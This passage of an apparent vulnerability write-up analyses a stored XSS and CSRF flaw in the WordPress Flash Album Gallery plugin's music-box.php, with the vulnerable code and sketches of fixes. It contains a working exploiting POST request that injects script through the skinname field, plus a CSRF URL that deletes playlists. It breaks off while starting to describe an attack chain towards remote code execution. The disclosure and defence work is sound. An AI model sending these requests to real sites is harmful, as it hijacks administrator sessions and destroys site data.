<span class="o">*</span><span class="w"> </span><span class="n">Fix</span><span class="p">:</span><span class="w"> </span><span class="n">bundled</span><span class="w"> </span><span class="n">free</span><span class="w"> </span><span class="n">skins</span><span class="w"> </span><span class="ow">not</span><span class="w"> </span><span class="n">copied</span><span class="w"> </span><span class="n">to</span><span class="w"> </span><span class="n">flagallery</span><span class="o">-</span><span class="n">skins</span><span class="w"> </span><span class="n">directory</span><span class="w"></span>
<span class="o">=</span><span class="w"> </span><span class="n">v2</span><span class="o">.</span><span class="mi">77</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="mf">25.06</span><span class="o">.</span><span class="mi">2013</span><span class="w"> </span><span class="o">=</span><span class="w"></span>
<span class="o">*</span><span class="w"> </span><span class="n">Fix</span><span class="p">:</span><span class="w"> </span><span class="n">vulnerability</span><span class="w"> </span><span class="n">with</span><span class="w"> </span><span class="n">albums</span><span class="w"></span>
<span class="o">*</span><span class="w"> </span><span class="n">Fix</span><span class="p">:</span><span class="w"> </span><span class="n">PHP</span><span class="w"> </span><span class="n">Notices</span><span class="w"></span>
<span class="o">*</span><span class="w"> </span><span class="n">Fix</span><span class="p">:</span><span class="w"> </span><span class="n">Compatibility</span><span class="w"> </span><span class="n">with</span><span class="w"> </span><span class="n">some</span><span class="w"> </span><span class="n">modern</span><span class="w"> </span><span class="n">themes</span><span class="w"></span>
<span class="o">*</span><span class="w"> </span><span class="n">Update</span><span class="p">:</span><span class="w"> </span><span class="n">New</span><span class="w"> </span><span class="n">version</span><span class="w"> </span><span class="n">of</span><span class="w"> </span><span class="n">swfupload</span><span class="w"></span>
<span class="o">*</span><span class="w"> </span><span class="n">Update</span><span class="p">:</span><span class="w"> </span><span class="n">Compatibility</span><span class="w"> </span><span class="n">with</span><span class="w"> </span><span class="n">Wordpress</span><span class="w"> </span><span class="n">SEO</span><span class="w"> </span><span class="n">plugin</span><span class="w"></span>
<span class="o">*</span><span class="w"> </span><span class="n">Update</span><span class="p">:</span><span class="w"> </span><span class="n">Update</span><span class="w"> </span><span class="n">code</span><span class="w"> </span><span class="k">for</span><span class="w"> </span><span class="n">default</span><span class="w"> </span><span class="n">skins</span><span class="w"></span>
</code></pre></div>
<p>I considered the issue solved [to my shame], declared the
research finished and forgot about flash-album-gallery.<br>
Recently, however, I revisited the code and saw that exactly the same
issue still exists, just with another variable in another file.</p>
<p>The affected file is music-box.php, located at
/wp-content/plugins/flash-album-gallery/admin/music-box.php. The
vulnerable function starts at LINE 17:</p>
<div class="highlight"><pre><span></span><code><span class="x">function flag_music_controler() {</span>
<span class="x"> if (isset($_POST['importfolder']) && $_POST['importfolder']){</span>
<span class="x"> check_admin_referer('flag_addmp3');</span>
<span class="x"> $mp3folder = $_POST['mp3folder'];</span>
<span class="x"> if ( !empty($mp3folder) )</span>
<span class="x"> flagAdmin::import_mp3($mp3folder);</span>
<span class="x"> }</span>
<span class="x"> $mode = isset($_REQUEST['mode'])? $_REQUEST['mode'] : 'main';</span>
<span class="x"> $action = isset($_REQUEST['bulkaction'])? $_REQUEST['bulkaction'] : false;</span>
<span class="x"> if($action == 'no_action') {</span>
<span class="x"> $action = false;</span>
<span class="x"> }</span>
<span class="x"> switch($mode) {</span>
<span class="x"> case 'sort':</span>
<span class="x"> include_once (dirname (__FILE__) . '/playlist-sort.php');</span>
<span class="x"> flag_playlist_order();</span>
<span class="x"> break;</span>
<span class="x"> case 'edit':</span>
<span class="x"> $file = urlencode($_GET['playlist']);</span>
<span class="x"> if(isset($_POST['updatePlaylist'])) {</span>
<span class="x"> $title = esc_html($_POST['playlist_title']);</span>
<span class="x"> $descr = esc_html($_POST['playlist_descr']);</span>
<span class="x"> $data = array();</span>
<span class="x"> foreach($_POST['item_a'] as $item_id => $item) {</span>
<span class="x"> if($action=='delete_items' && in_array($item_id, $_POST['doaction']))</span>
<span class="x"> continue;</span>
<span class="x"> $data[] = $item_id;</span>
<span class="x"> }</span>
<span class="x"> flagGallery::flagSaveWpMedia();</span>
<span class="x"> flagSavePlaylist($title,$descr,$data,$file);</span>
<span class="x"> }</span>
<span class="x"> if(isset($_POST['updatePlaylistSkin'])) {</span>
<span class="x"> flagSavePlaylistSkin($file);</span>
<span class="x"> }</span>
<span class="x"> include_once (dirname (__FILE__) . '/manage-playlist.php');</span>
<span class="x"> flag_playlist_edit();</span>
<span class="x"> break;</span>
<span class="x"> case 'save':</span>
<span class="x"> if(isset($_POST['items_array'])){</span>
<span class="x"> $title = esc_html($_POST['playlist_title']);</span>
<span class="x"> $descr = esc_html($_POST['playlist_descr']);</span>
<span class="x"> $data = $_POST['items_array'];</span>
<span class="x"> $file = isset($_REQUEST['playlist'])? urlencode($_REQUEST['playlist']) : false;</span>
<span class="x"> flagGallery::flagSaveWpMedia();</span>
<span class="x"> flagSavePlaylist($title,$descr,$data, $file);</span>
<span class="x"> }</span>
<span class="x"> if(isset($_GET['playlist'])) {</span>
<span class="x"> include_once (dirname (__FILE__) . '/manage-playlist.php');</span>
<span class="x"> flag_playlist_edit();</span>
<span class="x"> } else {</span>
<span class="x"> flag_created_playlists();</span>
<span class="x"> flag_music_wp_media_lib();</span>
<span class="x"> }</span>
<span class="x"> break;</span>
<span class="x"> case 'add':</span>
<span class="x"> if(isset($_POST['items']) && isset($_GET['playlist'])){</span>
<span class="x"> $added = $_POST['items'];</span>
<span class="x"> } elseif(isset($_GET['playlist'])) {</span>
<span class="x"> $added = $_COOKIE['musicboxplaylist_'.urlencode($_GET['playlist'])];</span>
<span class="x"> } else {</span>
<span class="x"> $added = false;</span>
<span class="x"> }</span>
<span class="x"> flag_music_wp_media_lib($added);</span>
<span class="x"> break;</span>
<span class="x"> case 'delete':</span>
<span class="x"> flag_playlist_delete(urlencode($_GET['playlist']));</span>
<span class="x"> case 'main':</span>
<span class="x"> if(isset($_POST['updateMedia'])) {</span>
<span class="x"> flagGallery::flagSaveWpMedia();</span>
<span class="x"> flagGallery::show_message( __('Media updated','flag') );</span>
<span class="x"> }</span>
<span class="x"> default:</span>
<span class="x"> flag_created_playlists();</span>
<span class="x"> flag_music_wp_media_lib();</span>
<span class="x"> break;</span>
<span class="x"> }</span>
<span class="x"> }</span>
</code></pre></div>
<p>This function and the calls it makes contain more
security bugs than I can describe here.<br>
To name just the critical one I mentioned before: the following POST request
inserts tainted data into a file, which
is later echoed back into the admin menu, where it triggers an XSS.</p>
<div class="highlight"><pre><span></span><code>============================================ EXPLOITING POST REQUEST ========================
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: {The wordpress cookie of the admin}
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 117
items_array[0]=notimportant<span class="err">&</span>playlist_title=some_title<span class="err">&</span>playlist_descr=some_description<span class="err">&</span>mode=save<span class="err">&</span>skinname="<span class="nt"><script></span>alert(/Script Code/)<span class="nt"></script></span>
=============================================================================================
</code></pre></div>
<p>Explanation:</p>
<p>Due to sloppy coding, this request is not protected by a nonce,
which would prevent a CSRF attack. For an explanation of nonces and why
they are important, look here:
http://www.prelovac.com/vladimir/improving-security-in-wordpress-plugins-using-nonces.<br>
However, the author
probably intended to protect it with a nonce, because he actually
inserted one into the form here:</p>
<div class="highlight"><pre><span></span><code><span class="c"><!--</span> <span class="err">#</span><span class="nx">new_playlist</span> <span class="o">--></span>
<span class="o"><</span><span class="nx">div</span> <span class="nx">id</span><span class="o">=</span><span class="s2">"new_playlist"</span> <span class="nx">style</span><span class="o">=</span><span class="s2">"display: none;"</span> <span class="o">></span>
<span class="o"><</span><span class="nx">form</span> <span class="nx">id</span><span class="o">=</span><span class="s2">"form_new_playlist"</span> <span class="nx">method</span><span class="o">=</span><span class="s2">"POST"</span> <span class="nx">action</span><span class="o">=</span><span class="s2">"</span><span class="cp"><?php</span> <span class="k">echo</span> <span class="nv">$filepath</span><span class="p">;</span> <span class="cp">?></span><span class="s2">"</span> <span class="nx">accept</span><span class="o">-</span><span class="nx">charset</span><span class="o">=</span><span class="s2">"utf-8"</span><span class="o">></span>
<span class="o">===></span> <span class="cp"><?php</span> <span class="nx">wp_nonce_field</span><span class="p">(</span><span class="s1">'flag_thickbox_form'</span><span class="p">);</span> <span class="cp">?></span>
<span class="o"><</span><span class="nx">input</span> <span class="nx">type</span><span class="o">=</span><span class="s2">"hidden"</span> <span class="nx">id</span><span class="o">=</span><span class="s2">"new_playlist_mp3id"</span> <span class="nx">name</span><span class="o">=</span><span class="s2">"items_array"</span> <span class="nx">value</span><span class="o">=</span><span class="s2">""</span> <span class="o">/></span>
<span class="o"><</span><span class="nx">input</span> <span class="nx">type</span><span class="o">=</span><span class="s2">"hidden"</span> <span class="nx">id</span><span class="o">=</span><span class="s2">"new_playlist_bulkaction"</span> <span class="nx">name</span><span class="o">=</span><span class="s2">"TB_bulkaction"</span> <span class="nx">value</span><span class="o">=</span><span class="s2">""</span> <span class="o">/></span>
<span class="o"><</span><span class="nx">input</span> <span class="nx">type</span><span class="o">=</span><span class="s2">"hidden"</span> <span class="nx">name</span><span class="o">=</span><span class="s2">"mode"</span> <span class="nx">value</span><span class="o">=</span><span class="s2">"save"</span> <span class="o">/></span>
<span class="o"><</span><span class="nx">input</span> <span class="nx">type</span><span class="o">=</span><span class="s2">"hidden"</span> <span class="nx">name</span><span class="o">=</span><span class="s2">"page"</span> <span class="nx">value</span><span class="o">=</span><span class="s2">"music-box"</span> <span class="o">/></span>
<span class="o"><</span><span class="nx">table</span> <span class="nx">width</span><span class="o">=</span><span class="s2">"100%"</span> <span class="nx">border</span><span class="o">=</span><span class="s2">"0"</span> <span class="nx">cellspacing</span><span class="o">=</span><span class="s2">"3"</span> <span class="nx">cellpadding</span><span class="o">=</span><span class="s2">"3"</span> <span class="o">></span>
</code></pre></div>
<p>Unfortunately, this nonce is never actually checked with an appropriate
function such as<br>
- <code>wp_verify_nonce($nonce, $action = -1)</code><br>
- <code>check_ajax_referer( $action = -1, $query_arg = false, $die = true )</code><br>
- <code>check_admin_referer($action = -1, $query_arg = '_wpnonce')</code></p>
<p>The missing nonce check alone constitutes a CSRF (XSRF) vulnerability, which is a
security threat in its own right. Because the check is missing in every case of the
switch statement
in the code excerpt above, the following request, for example, deletes whichever playlist
is specified by the GET parameter playlist: <code>http://localhost/wordpress/wp-admin/admin.php?page=flag-music-box&mode=delete&playlist={Which?}</code></p>
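<p>To make the idea behind such a check concrete, here is a minimal, self-contained sketch of an action-bound token in plain PHP. It is not WordPress's actual nonce implementation (real nonces also expire after a time window). The helper names <code>sketch_create_token()</code> and <code>sketch_verify_token()</code>, the secret and the user id are assumptions made up for illustration:</p>
<div class="highlight"><pre><span></span><code><?php
// Simplified stand-in for a WordPress nonce; NOT the real wp_create_nonce() algorithm.
// The helper names, $secret and the user id are hypothetical.

function sketch_create_token(string $action, int $userId, string $secret): string
{
    // Bind the token to the action and the user so it cannot be reused elsewhere.
    return hash_hmac('sha256', $action . '|' . $userId, $secret);
}

function sketch_verify_token(string $token, string $action, int $userId, string $secret): bool
{
    // hash_equals() compares in constant time to avoid timing side channels.
    return hash_equals(sketch_create_token($action, $userId, $secret), $token);
}

$secret = 'server-side-secret';
$token  = sketch_create_token('flag_thickbox_form', 1, $secret);

// A request that carries the token from the genuine form passes the check.
var_dump(sketch_verify_token($token, 'flag_thickbox_form', 1, $secret));

// A forged cross-site request cannot know the token and is rejected.
var_dump(sketch_verify_token('', 'flag_thickbox_form', 1, $secret));
</code></pre></div>
<p>In the plugin itself, the fix would presumably be a call like <code>check_admin_referer('flag_thickbox_form')</code> at the start of the save case, matching the action name passed to <code>wp_nonce_field()</code> in the form above.</p>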
<p>But back to the main issue. Remember that we can trick any WordPress admin
whose installation runs this plugin into visiting a poisoned page that executes
any of the cases in the switch statement above. Now consider the case save.
It calls a function named flagSavePlaylist().<br>
This function saves a music playlist to an XML file. Every parameter
that is written to the XML file is properly escaped with
functions like htmlspecialchars(). But one parameter is (strangely)
ignored: the variable $skin is populated with user-submittable
input and later written to the XML file (see the two
arrows below). Please note that an exploitation attempt will cause an error
message to be printed (see "!Error! ===>" below), because <code>file_get_contents()</code> is
called with a path built from the tainted $skin variable, and
script code
rarely looks like a valid path. But this doesn't stop
the exploit from working.</p>
<p>file /wp-content/plugins/flash-album-gallery/admin/music-box.php at
LINE 17:</p>
<div class="highlight"><pre><span></span><code><span class="w"> </span><span class="k">function</span><span class="w"> </span><span class="nf">flagSavePlaylist</span><span class="p">(</span>$title,$descr,$data,$file='',$skinaction=''<span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="k">global</span><span class="w"> </span>$<span class="n">wpdb</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="p">(</span>!<span class="n">trim</span><span class="p">(</span>$<span class="nb">title</span><span class="p">))</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span>$<span class="nb">title</span><span class="w"> </span><span class="p">=</span><span class="w"> </span><span class="s">'default'</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span>$<span class="nb">title</span><span class="w"> </span><span class="p">=</span><span class="w"> </span><span class="n">htmlspecialchars_decode</span><span class="p">(</span><span class="n">stripslashes</span><span class="p">(</span>$<span class="nb">title</span><span class="p">),</span><span class="w"> </span><span class="n">ENT_QUOTES</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span>$<span class="n">descr</span><span class="w"> </span><span class="p">=</span><span class="w"> </span><span class="n">htmlspecialchars_decode</span><span class="p">(</span><span class="n">stripslashes</span><span class="p">(</span>$<span class="n">descr</span><span class="p">),</span><span class="w"> </span><span class="n">ENT_QUOTES</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span>!$<span class="n">file</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span>$<span class="n">file</span><span class="w"> </span><span class="p">=</span><span class="w"> </span><span class="n">sanitize_title</span><span class="p">(</span>$<span class="nb">title</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="p">(</span>!<span class="n">is_array</span><span class="p">(</span>$<span class="n">data</span><span class="p">))</span><span class="w"></span>
<span class="w"> </span>$<span class="n">data</span><span class="w"> </span><span class="p">=</span><span class="w"> </span><span class="n">explode</span><span class="p">(</span><span class="s">','</span><span class="p">,</span><span class="w"> </span>$<span class="n">data</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span>$<span class="n">flag_options</span><span class="w"> </span><span class="p">=</span><span class="w"> </span><span class="n">get_option</span><span class="p">(</span><span class="s">'flag_options'</span><span class="p">);</span><span class="w"></span>
<span class="o">==</span><span class="p">=</span><span class="o">></span><span class="w"> </span>$<span class="n">skin</span><span class="w"> </span><span class="p">=</span><span class="w"> </span><span class="n">isset</span><span class="p">(</span>$<span class="n">_POST</span><span class="p">[</span><span class="s">'skinname'</span><span class="p">])</span>?<span class="w"> </span>$<span class="n">_POST</span><span class="p">[</span><span class="s">'skinname'</span><span class="p">]</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="s">'music_default'</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="p">(</span>!$<span class="n">skinaction</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span>$<span class="n">skinaction</span><span class="w"> </span><span class="p">=</span><span class="w"> </span><span class="n">isset</span><span class="p">(</span>$<span class="n">_POST</span><span class="p">[</span><span class="s">'skinaction'</span><span class="p">])</span>?<span class="w"> </span>$<span class="n">_POST</span><span class="p">[</span><span class="s">'skinaction'</span><span class="p">]</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="s">'update'</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span>$<span class="n">skinpath</span><span class="w"> </span><span class="p">=</span><span class="w"> </span><span class="n">trailingslashit</span><span class="p">(</span><span class="w"> </span>$<span class="n">flag_options</span><span class="p">[</span><span class="s">'skinsDirABS'</span><span class="p">]</span><span class="w"> </span><span class="p">).</span>$<span class="n">skin</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span>$<span class="n">playlistPath</span><span class="w"> </span><span class="p">=</span><span class="w"> </span><span class="n">ABSPATH</span><span class="p">.</span>$<span class="n">flag_options</span><span class="p">[</span><span class="s">'galleryPath'</span><span class="p">].</span><span class="o">'</span><span class="n">playlists</span><span class="o">/</span><span class="s">'.$file.'</span><span class="p">.</span><span class="n">xml</span><span class="o">'</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="p">(</span><span class="w"> </span><span class="n">file_exists</span><span class="p">(</span>$<span class="n">playlistPath</span><span class="p">)</span><span class="w"> </span><span class="o">&&</span><span class="w"> </span><span class="p">(</span>$<span class="n">skin</span><span class="w"> </span><span class="o">==</span><span class="w"> </span>$<span class="n">skinaction</span><span class="p">)</span><span class="w"> </span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span>$<span class="nb">settings</span><span class="w"> </span><span class="p">=</span><span class="w"> </span><span class="n">file_get_contents</span><span class="p">(</span>$<span class="n">playlistPath</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="sx">!Error! ===> $settings = file_get_contents($skinpath . "/settings/settings.xml");</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span>$<span class="nb">properties</span><span class="w"> </span><span class="p">=</span><span class="w"> </span><span class="n">flagGallery</span><span class="p">::</span><span class="n">flagGetBetween</span><span class="p">(</span>$<span class="nb">settings</span><span class="p">,</span><span class="s">'<properties>'</span><span class="p">,</span><span class="s">'</properties>'</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="p">(</span><span class="nb">count</span><span class="p">(</span>$<span class="n">data</span><span class="p">))</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span>$<span class="n">content</span><span class="w"> </span><span class="p">=</span><span class="w"> </span><span class="s">'<gallery></span>
<span class="s"> <properties>'</span><span class="p">.</span>$<span class="nb">properties</span><span class="p">.</span><span class="o">'</</span><span class="nb">properties</span><span class="o">></span><span class="w"></span>
<span class="w"> </span><span class="o"><</span><span class="n">category</span><span class="w"> </span><span class="n">id</span><span class="p">=</span><span class="s">"'.$file.'"</span><span class="o">></span><span class="w"></span>
<span class="w"> </span><span class="o"><</span><span class="nb">properties</span><span class="o">></span><span class="w"></span>
<span class="w"> </span><span class="o"><</span><span class="nb">title</span><span class="o">><</span>!<span class="p">[</span><span class="n">CDATA</span><span class="p">[</span><span class="s">'.$title.'</span><span class="p">]]]]</span><span class="o">><</span>!<span class="p">[</span><span class="n">CDATA</span><span class="p">[</span><span class="o">></</span><span class="nb">title</span><span class="o">></span><span class="w"></span>
<span class="w"> </span><span class="o"><</span><span class="n">description</span><span class="o">><</span>!<span class="p">[</span><span class="n">CDATA</span><span class="p">[</span><span class="s">'.$descr.'</span><span class="p">]]]]</span><span class="o">><</span>!<span class="p">[</span><span class="n">CDATA</span><span class="p">[</span><span class="o">></</span><span class="n">description</span><span class="o">></span><span class="w"></span>
<span class="o">==</span><span class="p">=</span><span class="o">></span><span class="w"> </span><span class="o"><</span><span class="n">skin</span><span class="o">><</span>!<span class="p">[</span><span class="n">CDATA</span><span class="p">[</span><span class="s">'.$skin.'</span><span class="p">]]]]</span><span class="o">><</span>!<span class="p">[</span><span class="n">CDATA</span><span class="p">[</span><span class="o">></</span><span class="n">skin</span><span class="o">></span><span class="w"></span>
<span class="w"> </span><span class="o"></</span><span class="nb">properties</span><span class="o">></span><span class="w"></span>
<span class="w"> </span><span class="o"><</span><span class="n">items</span><span class="o">></span><span class="s">';</span>
<span class="s"> foreach( (array) $data as $id) {</span>
<span class="s"> $mp3 = get_post($id);</span>
<span class="s"> if($mp3->post_mime_type == '</span><span class="n">audio</span><span class="o">/</span><span class="n">mpeg</span><span class="o">'</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span>$<span class="n">thumb</span><span class="w"> </span><span class="p">=</span><span class="w"> </span><span class="n">get_post_meta</span><span class="p">(</span>$<span class="n">id</span><span class="p">,</span><span class="w"> </span><span class="s">'thumbnail'</span><span class="p">,</span><span class="w"> </span><span class="nb">true</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span>$<span class="n">content</span><span class="w"> </span><span class="p">.=</span><span class="w"> </span><span class="s">'</span>
<span class="s"> <item id="'</span><span class="p">.</span>$<span class="n">mp3</span><span class="o">-></span><span class="n">ID</span><span class="p">.</span><span class="o">'</span><span class="s">"></span>
<span class="s"> <track>'.wp_get_attachment_url($mp3->ID).'</track></span>
<span class="s"> <title><![CDATA['.$mp3->post_title.']]]]><![CDATA[></title></span>
<span class="s"> <description><![CDATA['.$mp3->post_content.']]]]><![CDATA[></description></span>
<span class="s"> <thumbnail>'.$thumb.'</thumbnail></span>
<span class="s"> </item>';</span>
<span class="s"> }</span>
<span class="s"> }</span>
<span class="s"> $content .= '</span>
<span class="s"> </items></span>
<span class="s"> </category></span>
<span class="s"> </gallery>';</span>
<span class="s"> // Save options</span>
<span class="s"> $flag_options = get_option('flag_options');</span>
<span class="s"> if(wp_mkdir_p(ABSPATH.$flag_options['galleryPath'].'playlists/')) {</span>
<span class="s"> if( flagGallery::saveFile($playlistPath,$content,'w') ){</span>
<span class="s"> flagGallery::show_message(__('Playlist Saved Successfully','flag'));</span>
<span class="s"> }</span>
<span class="s"> } else {</span>
<span class="s"> flagGallery::show_message(__('Create directory please:','flag').'"</span><span class="o">/</span><span class="s">'.$flag_options['</span><span class="n">galleryPath</span><span class="o">'</span><span class="p">].</span><span class="o">'</span><span class="n">playlists</span><span class="o">/</span>"<span class="s">'</span><span class="err">);</span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
</code></pre></div>
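<p>As an aside, one way to keep script code out of the XML file in the first place would be to validate the skin name before it is used. The following is only a sketch in plain PHP: the helper <code>sketch_sanitize_skin()</code> is hypothetical and not part of the plugin, and the allowed character set is an assumption about what a skin directory name looks like:</p>
<div class="highlight"><pre><span></span><code><?php
// Hypothetical helper, not part of the plugin: accept only plain directory names.
function sketch_sanitize_skin(string $skin, string $default = 'music_default'): string
{
    // Allow letters, digits, underscore and hyphen only (assumed naming scheme).
    // Anything else, including markup or path separators, falls back to the default.
    return preg_match('/\A[A-Za-z0-9_-]+\z/', $skin) === 1 ? $skin : $default;
}

// A normal skin name passes through unchanged.
var_dump(sketch_sanitize_skin('music_default'));

// The payload from the exploit request is replaced by the default skin.
var_dump(sketch_sanitize_skin('"<script>alert(/Script Code/)</script>'));

// Path traversal attempts are rejected as well.
var_dump(sketch_sanitize_skin('../../etc'));
</code></pre></div>
<p>A whitelist like this would also keep the tainted value out of the path that is later handed to <code>file_get_contents()</code>.</p>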
<p>Now we know that tainted [html/javascript] data ends up in an XML file. This
is not dangerous by itself [but bad enough].<br>
But what if this data is written back to the browser without
sanitization? Then we could run any script code within an admin
session.</p>
<p>But this is exactly what happens here in the file /wp-content/plugins/flash-album-gallery/admin/music-box.php at LINE 386:</p>
<div class="highlight"><pre><span></span><code><span class="x"> </span><span class="cp"><?php</span> <span class="k">if</span><span class="p">(</span><span class="nv">$added</span><span class="o">===</span><span class="k">false</span><span class="p">)</span> <span class="p">{</span> <span class="cp">?></span><span class="x"></span>
<span class="x"> <input name="updateMedia" class="button-primary" style="float: right;" type="submit" value="</span><span class="cp"><?php</span> <span class="nx">_e</span><span class="p">(</span><span class="s1">'Update Media'</span><span class="p">,</span><span class="s1">'flag'</span><span class="p">);</span> <span class="cp">?></span><span class="x">" /></span>
<span class="x"> </span><span class="cp"><?php</span> <span class="k">if</span> <span class="p">(</span> <span class="nb">function_exists</span><span class="p">(</span><span class="s1">'json_encode'</span><span class="p">)</span> <span class="p">)</span> <span class="p">{</span> <span class="cp">?></span><span class="x"></span>
<span class="x"> <select name="bulkaction" id="bulkaction"></span>
<span class="x"> <option value="no_action" ></span><span class="cp"><?php</span> <span class="nx">_e</span><span class="p">(</span><span class="s2">"No action"</span><span class="p">,</span><span class="s1">'flag'</span><span class="p">);</span> <span class="cp">?></span><span class="x"></option></span>
<span class="x"> <option value="new_playlist" ></span><span class="cp"><?php</span> <span class="nx">_e</span><span class="p">(</span><span class="s2">"Create new playlist"</span><span class="p">,</span><span class="s1">'flag'</span><span class="p">);</span> <span class="cp">?></span><span class="x"></option></span>
<span class="x"> </select></span>
<span class="x"> <input name="showThickbox" class="button-secondary" type="submit" value="</span><span class="cp"><?php</span> <span class="nx">_e</span><span class="p">(</span><span class="s1">'Apply'</span><span class="p">,</span><span class="s1">'flag'</span><span class="p">);</span> <span class="cp">?></span><span class="x">" onclick="if ( !checkSelected() ) return false;" /></span>
<span class="x"> </span><span class="cp"><?php</span> <span class="p">}</span> <span class="cp">?></span><span class="x"></span>
<span class="x"> <a href="</span><span class="cp"><?php</span> <span class="k">echo</span> <span class="nx">admin_url</span><span class="p">(</span> <span class="s1">'media-new.php'</span><span class="p">);</span> <span class="cp">?></span><span class="x">" class="button"></span><span class="cp"><?php</span> <span class="nx">_e</span><span class="p">(</span><span class="s1">'Upload Music'</span><span class="p">,</span><span class="s1">'flag'</span><span class="p">);</span> <span class="cp">?></span><span class="x"></a></span>
<span class="x"> <input type="hidden" id="items_array" name="items_array" value="" /></span>
<span class="x"> </span><span class="cp"><?php</span> <span class="p">}</span> <span class="k">else</span> <span class="p">{</span> <span class="cp">?></span><span class="x"></span>
<span class="x"> <input type="hidden" name="mode" value="save" /></span>
<span class="x"> <input style="width: 80%;" type="text" id="items_array" name="items_array" readonly="readonly" value="</span><span class="cp"><?php</span> <span class="k">echo</span> <span class="nv">$added</span><span class="p">;</span> <span class="cp">?></span><span class="x">" /></span>
<span class="x"> <input type="hidden" name="playlist_title" value="</span><span class="cp"><?php</span> <span class="k">echo</span> <span class="nx">esc_html</span><span class="p">(</span><span class="nb">stripslashes</span><span class="p">(</span><span class="nv">$playlist</span><span class="p">[</span><span class="s1">'title'</span><span class="p">]));</span> <span class="cp">?></span><span class="x">" /></span>
<span class="x">===> <input type="hidden" name="skinname" value="</span><span class="cp"><?php</span> <span class="k">echo</span> <span class="nv">$playlist</span><span class="p">[</span><span class="s1">'skin'</span><span class="p">];</span> <span class="cp">?></span><span class="x">" /></span>
<span class="x">===> <input type="hidden" name="skinaction" value="</span><span class="cp"><?php</span> <span class="k">echo</span> <span class="nv">$playlist</span><span class="p">[</span><span class="s1">'skin'</span><span class="p">];</span> <span class="cp">?></span><span class="x">" /></span>
<span class="x"> <textarea style="display: none;" name="playlist_descr" cols="40" rows="1"></span><span class="cp"><?php</span> <span class="k">echo</span> <span class="nx">esc_html</span><span class="p">(</span><span class="nb">stripslashes</span><span class="p">(</span><span class="nv">$playlist</span><span class="p">[</span><span class="s1">'description'</span><span class="p">]));</span> <span class="cp">?></span><span class="x"></textarea></span>
<span class="x"> <input name="addToPlaylist" class="button-secondary" type="submit" value="</span><span class="cp"><?php</span> <span class="nx">_e</span><span class="p">(</span><span class="s1">'Update Playlist'</span><span class="p">,</span><span class="s1">'flag'</span><span class="p">);</span> <span class="cp">?></span><span class="x">" /></span>
<span class="x"> </span><span class="cp"><?php</span> <span class="p">}</span> <span class="cp">?></span><span class="x"></span>
</code></pre></div>
<p>Hence, the form that creates the request is also responsible for
writing the tainted data back to the screen. I find it rather strange
that all the other echo usages are wrapped in <code>esc_html()</code> calls,
while it was forgotten that <code>$playlist['skin']</code> holds tainted data as
well. Maybe the changes in the last fix [as reported by 'Ken S'] weren't that
deep. More likely, though, this is just another bug that hasn't been found
before.</p>
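<p>To illustrate why the missing escaping matters, here is a minimal sketch in Python (not the plugin's PHP). The helper <code>render_hidden_input</code> and the sample value are made up for this illustration; in WordPress itself, the analogous fix would presumably be wrapping the value in an escaping function such as <code>esc_attr()</code>.</p>

```python
import html


def render_hidden_input(name: str, value: str, escape: bool = True) -> str:
    """Render an <input type="hidden"> tag, optionally escaping the value.

    Hypothetical helper for illustration only; it mimics what the PHP
    template does when it echoes $playlist['skin'] into an attribute.
    """
    if escape:
        # quote=True also converts " and ' so the value cannot close the attribute.
        value = html.escape(value, quote=True)
    return f'<input type="hidden" name="{name}" value="{value}" />'


# Hypothetical tainted value: a quote that closes the attribute, then markup.
tainted = '" /><script>alert(1)</script>'

unsafe = render_hidden_input("skinname", tainted, escape=False)
safe = render_hidden_input("skinname", tainted, escape=True)

print(unsafe)  # the script tag ends up as live markup
print(safe)    # the same value stays inside the attribute as inert text
```

<p>In the unescaped variant the leading quote terminates the <code>value</code> attribute, so everything after it is parsed as markup. In the escaped variant the browser sees only an odd-looking attribute value.</p>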
<h3>Now what can an attacker do with this exploit?</h3>
<p>He could, for example, gain access to the server and achieve remote code
execution. Imagine we trick a WordPress administrator who still has valid
admin cookies for his WordPress site [which is quite often the case when you
look at your own blog] into visiting a site with a hidden form. You could, for
example, write a comment on the WordPress site with a link to the attacking
site, which incorporates the attacking code below. This would be quite a
strong attack, since every WordPress administrator is happy to see comments on
